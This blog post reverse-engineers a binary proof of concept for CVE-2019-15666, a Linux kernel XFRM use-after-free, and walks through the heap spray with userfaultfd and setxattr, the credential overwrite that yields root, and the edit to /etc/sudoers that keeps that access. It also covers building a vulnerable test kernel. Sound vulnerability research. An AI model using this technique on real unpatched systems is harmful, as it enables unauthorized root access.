Back to news

Exploiting CVE-2019-15666 by reversing the binary PoC

By BU Cyber

On January 15, 2020, security researcher Vitaly Nikolenko published a blog post following the disclosure of CVE-2019-15666. In this post, he details a privilege-escalation exploit using this vulnerability to gain root privileges from a standard user.

Alongside his blog post, he released a technical report as well as a Proof of Concept for his exploit. However, he only published the PoC as a binary, and did not share the source code of his exploit. The exploit is based on a Use-After-Free in the XFRM subsystem. In the technical report, Vitaly briefly sums up the steps needed to trigger the bug, but staying at a relatively “high level”.

In order to better understand the vulnerability and the way it was exploited, we decided to reverse the PoC. Our goal was mainly to be able to recode the exploit while understanding all the steps of the exploitation process.

With a Virtual Machine running a vulnerable kernel and able to be remotely live debugged, we worked on two different approaches through dynamic and static analysis of the PoC. In the next sections, we detail our findings with these two methods.

Understanding XFRM policies

The exploit revolves around inserting new XFRM policies to trigger a Use-After-Free bug.

XFRM is a Linux kernel module, whose job is to handle IPsec features by managing the Security Policy Database (SPD) as well as the Security Association Database (SAD). This article was really helpful in understanding XFRM policies, their role and how they can be manipulated by a user. It also includes an example in C with the correct data structures to use when manipulating XFRM policies within a program.

From the thechnical report for the vulnerability, we can gather that the exploit is based on the successive insertion of two new policies:

the first policy object is inserted with index 0 (auto-generated by the subsystem), direction 0 and priority 0;
the second policy object is inserted with the user-defined index = 4, direction 0, priority 1 (>0) and a timer set;
a XFRM_SPD_IPV4_HTHRESH request is issued to trigger policy rehashing;
a XFRM_FLUSH_POLICY request is then issued, freeing the first policy;
once the timer expires on the second policy, UAF is triggered on the first policy that was freed in the previous step.

The beforementioned article shows how to insert a new security policy, which is exactly what we have to do for the first steps of the exploit, although we need to adjust some values from the generic policy given in the example.

Translating the PoC to human-readable code

To reverse the binary, we mainly used IDA and Ghidra. From the article about XFRM policies we knew how new policies were being inserted which made the reversing of these functions easier. Since the source code was in C, the whole reversing process wasn’t too oblivious, even though the Ghidra disassembler was far from used to working with these kind of data structures.

The C code for the exploit and other relevant files can be found on our Github.

Identifying syscalls

When looking at the imported functions in IDA, we can see that the syscall() function is used several times in the exploit.

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/imports.png

Imported functions into the binary

Checking cross-references, the syscall function is used four times, including three times in the main function, and an additional time in an unnamed sub-fuction (as the binary is stripped). To understand what syscalls are being used, a syscall table can be used. It is important to note that the exploit is in 64 bits.

The three syscalls in main() are just exit calls, but for the call in the sub-function, the syscall number is 0x143 which corresponds to:

323 common userfaultfd sys_userfaultfd

This syscall is used in a heap spraying technique that will be explained in more details in following sections. As the userfaultfd syscall does not have a glibc wrapper, we have to keep the use of syscall() and simply replace the 0x143 with the appropriate SYS_userfaultfd constant in our translated C code.

Bad request flags

Reversing functions which send messages to kernel is quite straightforward and produce understandable code:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/xfrm_add_policy_0.png

Assembly code for adding a policy

However, the usable flags for a XFRM_MSG_NEWPOLICY request are defined in the include/uapi/linux/netlink.h file:

/* Flags values */

#define NLM_F_REQUEST		0x01	/* It is request message. 	*/
...

/* Modifiers to NEW request */
#define NLM_F_REPLACE   0x100    /* Override existing		*/
#define NLM_F_EXCL      0x200    /* Do not touch, if it exists	*/
#define NLM_F_CREATE    0x400    /* Create, if it does not exist	*/
#define NLM_F_APPEND    0x800    /* Add to end of list		*/

So there is no coherent sum of flags which gives 0x301, as 0x100 and 0x200 are contradictory. And there are various places in the kernel where the two flags are indeed mutually exclusive. This means that there may be some small mistakes or typos in the PoC.

Other typos in the original sources ?

Two IPv6 addresses are defined in the xfrm_add_policy_0() function:

one destination: fe80:0:0:0:0:0:0:aa(fe80::aa), which is one of the reserved values for link-local address;
one source: 0:0:0:0:a00:0:0:0, which drives nowhere.

There is also a useless double copy of the first IPv6 block in the function:

Typo

The second copy was maybe targeting the source address but there was a confusion between daddr and saddr in the code.

The userfaultfd() syscall

Page faults

Page faults are a kind of exception raised by the CPU to inform the OS of an access to some data which is not (yet) mapped in memory. In response to the fault, the OS will allocate more pages to the process and fill these pages with the requested data. It will then update the MMU and tell the CPU to resume execution.

Despite its name, a page fault are not an error but rather a common known event. Most of the time, page faults are only handled in kernel space, but the userfaultfd() syscall is used to handle page faults in user space.

userfaultfd() was originally created to extend the capabilities of Linux regarding virtual memory: for instance, the new syscall increases the speed of live migration of virtual machines between physical hosts or allows live snapshotting of running processes. Several use-cases of this feature exist and are listed on the page linked above.

Memory manipulation with userfaultfd()

The author of the exploit published an excellent post a few years ago, in which he shares a very powerful technique that uses userfaultfd() and setxattr() in order to exploit Use-After-Free bugs in the Linux kernel via a heap spray.

The main idea is that userfaultfd() gives control over the lifetime of data which is allocated by setxattr() in the kernel space. As is specified in the man page for userfaultfd():

When the last file descriptor referring to a userfaultfd object is closed, all memory ranges that were registered with the object are unregistered and unread events are flushed.

This means that, as long as the file descriptor stays open, the object will stay in kernel space.

Overall, the use of userfaultfd is pretty complex, especially when being weaponized for this kind of exploitation.

Running the exploit

While not mandatory, using a Virtual Machine to run the exploit eases the understanding of the exploitation. A small VM with 2Gb RAM, 20Gb disk space, 2 CPUs and a minimal Ubuntu installation is enough.

Building a vulnerable kernel

Downloading the sources

The CVE-2019-15666 has been fixed in the 4.15.0-60.67 kernel for Ubuntu 18.04 LTS (Bionic Beaver).

The list of all the versions can be retrieved thanks to the following command:

$ apt-cache search linux-image-unsigned-4.15 | grep generic
...
linux-image-unsigned-4.15.0-55-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-58-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-60-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-62-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-64-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-65-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-66-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-69-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP
linux-image-unsigned-4.15.0-70-generic - Linux kernel image for version 4.15.0 on 64 bit x86 SMP

In order to get kernel sources from the Ubuntu server, the following line has to be uncommented in the /etc/apt/sources.list file:

deb-src http://fr.archive.ubuntu.com/ubuntu/ bionic main restricted

Then the list of available data has to be refreshed through apt-get update and requirements for compiling a kernel can be downloaded:

# apt-get update
# apt-get build-dep linux linux-image-$(uname -r)
# apt-get install libncurses-dev flex bison openssl libssl-dev dkms libelf-dev libudev-dev libpci-dev libiberty-dev autoconf
# apt-get install fakeroot

The sources of the last kernel before the patch was applied can then be downloaded into a new directory with:

$ mv kernel kernel.old
$ mkdir kernel
$ cd kernel
$ apt-get source linux-image-unsigned-4.15.0-58-generic

A quick look at the verify_newpolicy_info() function defined in the net/xfrm/xfrm_user.c file shows that the patch has not been applied, so the function remains vulnerable as intended.

Compiling the kernel

Recompiling a custom Linux kernel and producing packages which can be installed are well-documented, at least for Ubuntu. However, the process is quite heavy and slow, as plenty of useless kernel modules are compiled in order to reproduce an official Ubuntu kernel. It is more efficient to rebuild a kernel manually from the official Ubuntu sources.

The first step is to define a minimal build configuration:

$ cd linux-4.15.0/
$ make defconfig

The features required by the exploit have to be enabled:

$ echo CONFIG_USER_NS=y >> .config
$ echo CONFIG_USERFAULTFD=y >> .config

In order to extract some information about the involved structures from the final vmlinux binary, this extra option is needed:

$ echo CONFIG_DEBUG_INFO=y >> .config

To be able to do some live debugging on the running kernel with gdb, it is advised to select a few extra options:

$ echo CONFIG_GDB_SCRIPTS=y >> .config
$ echo CONFIG_FRAME_POINTER=y >> .config
$ echo CONFIG_KGDB=y >> .config
$ echo CONFIG_KGDB_SERIAL_CONSOLE=y >> .config
$ echo CONFIG_KDB_KEYBOARD=y >> .config

The framebuffer is useful to get boot messages in the TTY console. The relative support can be quickly grabbed from the current configuration:

$ < /boot/config-5.3.0-46-generic grep _FB_ >> .config

If the VM is running via KVM, the virtio drivers are required for the VM to support the default disk and network card:

$ < /boot/config-5.3.0-46-generic grep _VIRTIO >> .config

All the modules have to be integrated in the core binary to get a standalone kernel, and the configuration also has to be updated:

$ sed -i 's/=m$/=y/' .config
$ make olddefconfig

All these configuration steps can also be run using a provided define-cfg.sh script.

Finally the kernel can be compiled:

$ make -j $(( $(nproc) * 2 ))

The whole compilation process takes about 15 minutes in the small VM we set up.

Booting the vulnerable kernel

The kernel image has to be copied in the /boot directory first:

 # cp arch/x86/boot/bzImage /boot/vmlinuz-4.15.0-lucky

For the boot process, the grub configuration has to be modified:

 # sed -i 's/^GRUB_CMDLINE_LINUX_DEFAULT=.*$/GRUB_CMDLINE_LINUX_DEFAULT="text loglevel=1 kgdboc=ttyS0,115200 nokaslr"/' /etc/default/grub

Moreover it may be convenient to have time to change boot options at startup:

# sed -i 's/^GRUB_TIMEOUT=.*$/GRUB_TIMEOUT=2/' /etc/default/grub
# sed -i 's/^GRUB_TIMEOUT_STYLE=.*$/GRUB_TIMEOUT_STYLE=countdown/' /etc/default/grub

In order to enjoy a bigger TTY console resolution, the framebuffer can be extended too:

# echo GRUB_GFXMODE=1920x1080x16 >> /etc/default/grub
# echo GRUB_GFXPAYLOAD_LINUX=keep >> /etc/default/grub

These values come from the hwinfo tool:

# apt install hwinfo
# hwinfo --framebuffer | grep 1920x
  Mode 0x0387: 1920x1200 (+3840), 16 bits
  Mode 0x0388: 1920x1200 (+5760), 24 bits
  Mode 0x0389: 1920x1200 (+7680), 24 bits
  Mode 0x0390: 1920x1080 (+3840), 16 bits
  Mode 0x0391: 1920x1080 (+5760), 24 bits
  Mode 0x0392: 1920x1080 (+7680), 24 bits

Without hwinfo, available settings can be displayed in a Grub shell (press [c]) thanks to the vbeinfo command.

While in the Grub shell, there is a way to scroll the output of the command by setting a variable:

 set pager=1

Selecting the new kernel as the default kernel is a little more tricky but can be achieved by the update-grub.sh script:

 $ sudo ~/update-grub.sh && sudo reboot

Disabling the useless desktop GUI

To avoid starting a graphical session, systemd must not to load the graphical login manager:

# systemctl enable multi-user.target --force
# systemctl set-default multi-user.target

About live debugging

Once the VM is running, triggering kgdb is done with the following command:

# echo g > /proc/sysrq-trigger

On the host side, if /dev/pts/2 refers to the serial device, gdb can be attached to the running kernel using a local copy of the kernel binary and the following command:

$ gdb ./vmlinux -ex 'set remotebaud 115200' -ex 'target remote /dev/pts/2'

Explanation of the exploitation

First clues

The Use-After-Free described in the technical report affects XFRM policies. The size of relative structures can be retrieved using gdb:

$ gdb ./vmlinux --batch -ex 'p sizeof(struct xfrm_policy)'
$1 = 784

All policies are then allocated using the kmalloc-1024 SLAB allocator, which handles requests for 513 to 1024 bytes.

What is surprising when reading the code retrieved by reversing the binary PoC is the fact that the heap spray produced by the original exploit does not fill the memory with user-selected values. This spray is setup using a public technique involving the userfaultfd() and setxattr() syscalls:

...

void *addr;

addr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
{
    perror("mmap");
    exit(-1);
}

ret = uffd_setup(addr, 0x1000, flag, idx);

...

setxattr("/etc/passwd", "user.test", addr, 0x400, XATTR_CREATE); 

return ret;

But in the current case source for the userfaultfd() copy is only user space stack garbage:

...
void *addr;
struct uffdio_copy io_copy;
char src[0x1000];

...

addr = (void *)(msg.arg.pagefault.address & 0xfffffffffffff000);

io_copy.dst = (unsigned long)addr;
io_copy.src = (unsigned long)src;
io_copy.len = 0x1000;
io_copy.mode = 0;

if (...)
{
    if ((ioctl(fd, UFFDIO_COPY, &io_copy)) != 0)
        perror("UFFDIO_COPY");
}
else if ((ioctl(fd, UFFDIO_COPY, &io_copy)) != 0)
    perror("UFFDIO_COPY");
...

The privilege escalation seems not to rely on complex exploitation with object confusion happening in the kernel space.

The technical report talks about some 8-byte write primitive. What about writing the struct cred directly ? Once again, gdb comes to the rescue ! The overwritten pprev field is a 8-byte value located at offset 0x16:

$ gdb ./vmlinux --batch -ex 'pt /o struct xfrm_policy'
/* offset    |  size */  type = struct xfrm_policy {
/*    0      |     8 */    possible_net_t xp_net;
/*    8      |    16 */    struct hlist_node {
/*    8      |     8 */        struct hlist_node *next;
/*   16      |     8 */        struct hlist_node **pprev;

                               /* total size (bytes):   16 */
                           } bydst;
/*   24      |    16 */    struct hlist_node {
/*   24      |     8 */        struct hlist_node *next;
/*   32      |     8 */        struct hlist_node **pprev;

                               /* total size (bytes):   16 */
                           } byidx;
/*   40      |     8 */    rwlock_t lock;
/*   48      |     4 */    refcount_t refcnt;
...

Looking at the struct cred content reveals that the sgid and euid fields are the 8-bytes values located at offset 0x16:

$ gdb ./vmlinux --batch -ex 'pt /o struct cred'
/* offset    |  size */  type = struct cred {
/*    0      |     4 */    atomic_t usage;
/*    4      |     4 */    kuid_t uid;
/*    8      |     4 */    kgid_t gid;
/*   12      |     4 */    kuid_t suid;
/*   16      |     4 */    kgid_t sgid;
/*   20      |     4 */    kuid_t euid;
/*   24      |     4 */    kgid_t egid;
/*   28      |     4 */    kuid_t fsuid;
/*   32      |     4 */    kgid_t fsgid;
/*   36      |     4 */    unsigned int securebits;
/*   40      |     8 */    kernel_cap_t cap_inheritable;
/*   48      |     8 */    kernel_cap_t cap_permitted;
/*   56      |     8 */    kernel_cap_t cap_effective;
/*   64      |     8 */    kernel_cap_t cap_bset;
/*   72      |     8 */    kernel_cap_t cap_ambient;
...

The struct cred objects are allocated using a dedicated cache. But as the SLUB allocator merges all similar caches, such objects get finally allocated using the kmalloc-192 allocator:

$ gdb ./vmlinux --batch -ex 'p sizeof(struct cred)'
$1 = 168

How could an overwrite on objects from a given allocator have consequences on object belonging to another allocator?

Kernel allocator behavior

The struct kmem_cache object handles dynamic memory allocations in the kernel. Its behavior is well-described on the Internet:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/understand-html037.png

Layout of the SLAB allocator from the Linux kernel documentation

Each kind of allocators (SLAB, SLUB) relies on slabs managing several physical memory pages. Allocations use these pages as sources to provide allocated memory areas on request. Slabs may exist in one of the following states :

empty: all objects on a slab are free;
partial: slab consists of both used and free objects;
full: all objects on a slab are used.

When the Linux kernel decides to release an empty slab, the relative physical pages return to the pool of available pages. Such pages can migrate from one cache to another, depending on the system activity.

Path of exploitation

The lucky0 exploit makes the XFRM policy #1 overwrite a field in a free XFRM policy #0.

These two objects have to belong to different slabs if the policy #0 has to get changed into another object of a different size:

the policy #1 remains a valid XFRM policy, so this policy stays in the kmalloc-1024 cache;
the policy #0 is freed. If its slab gets freed, the relative memory can be reused for another cache, the kmalloc-192 one for struct cred objects for instance.

That is exactly what the original exploit does.

Before going into details, here is the big picture:

https://blog-cyber.riskeco.com/wp-content/uploads/2020/07/lucky_process.png

Execution flow of the original exploit

Allocation of policy #0

This operation is done using the call to the xfrm_add_policy_0() function. Then a heap spray is done using setxattr() syscalls. A part of the spray is only launched after the allocation of a xfrm_policy object for policy #0, by unlocking the read operation on pipes.

This is done to ensure distance between the two XFRM policies in memory: this 2-step spray reduces the risk of having the policy #0 and the policy #1 in the same slab as the second step fills all remaining available space in the slab used for policy #0.

Allocation of policy #1 and triggering the bug

The second policy is setup using the call to the xfrm_add_policy1() function. Then the buggy situation is prepared by calling xfrm_hash_rebuild() and xfrm_flush_policy0() functions. The incoming timer on policy #1 will actually trigger the bug later.

Memory replacement

Closing the second pipe unblocks other waiting read operations in the userfaultfd() handler: this aborts the blocking read in the uffd_spray_handler() function, the setxattr() syscall terminate and children then proceed in their next operations.

When the setxattr()syscalls terminate, the memory allocated for copying the 1024-byte value into the kernel memory is free. If this memory was nearby the free policy #0, chances are that the relative slab gets emptied and thus freed, too. The next call to setgid() drives to struct cred allocation, with a potential reuse of memory used by policy #0.

The tiny code of the setgid()syscall shows a call to the prepare_creds() function without condition, as well as an inserted WARN_ON(1) trace:

Apr 13 12:56:31 ubuntu18 kernel: [   30.088409] ------------[ cut here ]------------
Apr 13 12:56:31 ubuntu18 kernel: [   30.088442] WARNING: CPU: 0 PID: 2405 at kernel/cred.c:296 prepare_creds+0x150/0x160
Apr 13 12:56:31 ubuntu18 kernel: [   30.088443] Modules linked in:
Apr 13 12:56:31 ubuntu18 kernel: [   30.088448] CPU: 0 PID: 2405 Comm: lucky0 Tainted: G        W        4.15.18 #38
Apr 13 12:56:31 ubuntu18 kernel: [   30.088450] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
Apr 13 12:56:31 ubuntu18 kernel: [   30.088454] RIP: 0010:prepare_creds+0x150/0x160
Apr 13 12:56:31 ubuntu18 kernel: [   30.088456] RSP: 0018:ffffc90001f1ff08 EFLAGS: 00010296
Apr 13 12:56:31 ubuntu18 kernel: [   30.088459] RAX: 0000000000000024 RBX: ffff88801c183b40 RCX: 0000000000000006
Apr 13 12:56:31 ubuntu18 kernel: [   30.088461] RDX: 0000000000000007 RSI: 0000000000000086 RDI: ffff88803fc154f0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088463] RBP: ffff88802bf0e200 R08: 0000000000011331 R09: 0000000000000004
Apr 13 12:56:31 ubuntu18 kernel: [   30.088465] R10: 0000000000000000 R11: 0000000000000001 R12: ffff88802bf0e200
Apr 13 12:56:31 ubuntu18 kernel: [   30.088466] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088469] FS:  00007fc32fb81740(0000) GS:ffff88803fc00000(0000) knlGS:0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088471] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Apr 13 12:56:31 ubuntu18 kernel: [   30.088480] CR2: 00007f660640fe00 CR3: 000000002bfa4005 CR4: 0000000000360ef0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088482] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Apr 13 12:56:31 ubuntu18 kernel: [   30.088484] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Apr 13 12:56:31 ubuntu18 kernel: [   30.088485] Call Trace:
Apr 13 12:56:31 ubuntu18 kernel: [   30.088493]  SyS_setgid+0x32/0xb0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088497]  do_syscall_64+0x5b/0x110
Apr 13 12:56:31 ubuntu18 kernel: [   30.088501]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
Apr 13 12:56:31 ubuntu18 kernel: [   30.088504] RIP: 0033:0x7fc32f759f10
Apr 13 12:56:31 ubuntu18 kernel: [   30.088505] RSP: 002b:00007fffdd090070 EFLAGS: 00000246 ORIG_RAX: 000000000000006a
Apr 13 12:56:31 ubuntu18 kernel: [   30.088508] RAX: ffffffffffffffda RBX: 00007fffdd0900d0 RCX: 00007fc32f759f10
Apr 13 12:56:31 ubuntu18 kernel: [   30.088510] RDX: f8d5916a2c50cf00 RSI: 0000000000000000 RDI: 00000000000003e8
Apr 13 12:56:31 ubuntu18 kernel: [   30.088512] RBP: 00000000000000ca R08: 00007fc32f971330 R09: 00007fc32f96d2b0
Apr 13 12:56:31 ubuntu18 kernel: [   30.088514] R10: 00007fc32f971330 R11: 0000000000000246 R12: 00007fc32f971330
Apr 13 12:56:31 ubuntu18 kernel: [   30.088516] R13: 00007fc32f96d2b0 R14: 00007fffdd0900f0 R15: 00007fc32fb81740
Apr 13 12:56:31 ubuntu18 kernel: [   30.088519] Code: 49 b8 cd ab 78 56 cd ab 34 12 48 89 da 48 89 de 4c 89 c1 48 c7 c7 38 83 1e 82 e8 71 d1 02 00 48 c7 c7 c0 52 1d 82 e8 65 d1 02 00 <0f> 0b eb ab 66 90 66 2e 0f 1f 84 00 00 00 00 00 53 48 89 fb 48 
Apr 13 12:56:31 ubuntu18 kernel: [   30.088557] ---[ end trace ae5a0f95dd91ddd4 ]---

Gaining root access

If a child process got its struct cred overwritten, its euid field has now a zero value. This case is tested with a call to seteuid(0). If this call succeed, root access is granted!

Once the running process has gained root privileges, it then updates the content of the file /etc/sudoersto add the current user as a sudoer without any password restriction to make this privilege level persistent for this current user.

Execution path proof

The lucky-trace.patch patch can be applied to the kernel sources to trace the running exploit.

It is worth to warn that tracing the kernel execution with debug messages can modify the kernel behavior but in this case the exploit keeps exploiting.

Overwritten addresses can be retrieved after a few tries (5 here):

# cat $( ls -tr /var/log/syslog* ) | grep overwrite
Apr 13 15:55:57 ubuntu18 kernel: [   16.525727] POLICY overwrite *pprev=ffff88001d5c0808 <- next=0
Apr 13 15:56:12 ubuntu18 kernel: [   31.778637] POLICY overwrite *pprev=ffff88002abf4808 <- next=0
Apr 13 15:56:28 ubuntu18 kernel: [   47.029712] POLICY overwrite *pprev=ffff88001c125008 <- next=0
Apr 13 15:56:44 ubuntu18 kernel: [   62.302815] POLICY overwrite *pprev=ffff880026072008 <- next=0
Apr 13 15:56:59 ubuntu18 kernel: [   77.547406] POLICY overwrite *pprev=ffff88002dd5a008 <- next=0

The last entry refers to the successful overwrite of the prev field of the policy #1, which refers to the next field of the policy #0. So the policy #0 was located at:

0xffff88002dd5a008 - 8 = 0xffff88002dd5a000

There was a free 1024-byte slab for this location:

# cat $( ls -tr /var/log/syslog* ) | grep "SLAB free" | grep ffff88002dd5
Apr 13 15:57:00 ubuntu18 kernel: [   78.548715] SLAB free: ffff88002dd58000 -> ffff88002dd5c000
Apr 13 15:57:00 ubuntu18 kernel: [   78.548720] SLAB free: ffff88002dd50000 -> ffff88002dd54000
Apr 13 15:57:00 ubuntu18 kernel: [   78.556735] SLAB free: ffff88002dd4c000 -> ffff88002dd50000

The page was later reused for a 192-byte slab:

# cat $( ls -tr /var/log/syslog* ) | grep "SLAB alloc" | grep ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.373317] SLAB alloc: ffff88002dd59000 -> ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.374448] SLAB alloc: ffff88002dd5a000 -> ffff88002dd5b000

And there was indeed struct cred objects allocated for a lucky process at the location of the old policy #0:

# cat $( ls -tr /var/log/syslog* ) | grep "CRED" | grep ffff88002dd5a000
Apr 13 15:57:01 ubuntu18 kernel: [   79.374450] CRED alloc: ffff88002dd5a000
Apr 13 15:57:06 ubuntu18 kernel: [   84.454714] CRED alloc: ffff88002dd5a000

So the write primitive gained from the UAF has overwritten the process credentials.

Conclusion

In the end, we took a deep dive in the inner workings of this exploit for the CVE-2019-15666. We tried to introduce all the concepts needed to understand how the vulnerability was operating and shared interesting bits found when reversing the binary.

We also included all details needed for someone to try and reproduce our research

Following this, there are still lots of things that could be done to further the research. One thing to do would be to try and improve the sucess rate of the race condition, as it still takes some time to exploit a vulnerable system. It should also be interesting to port the exploit on other platforms that fulfill the required conditions.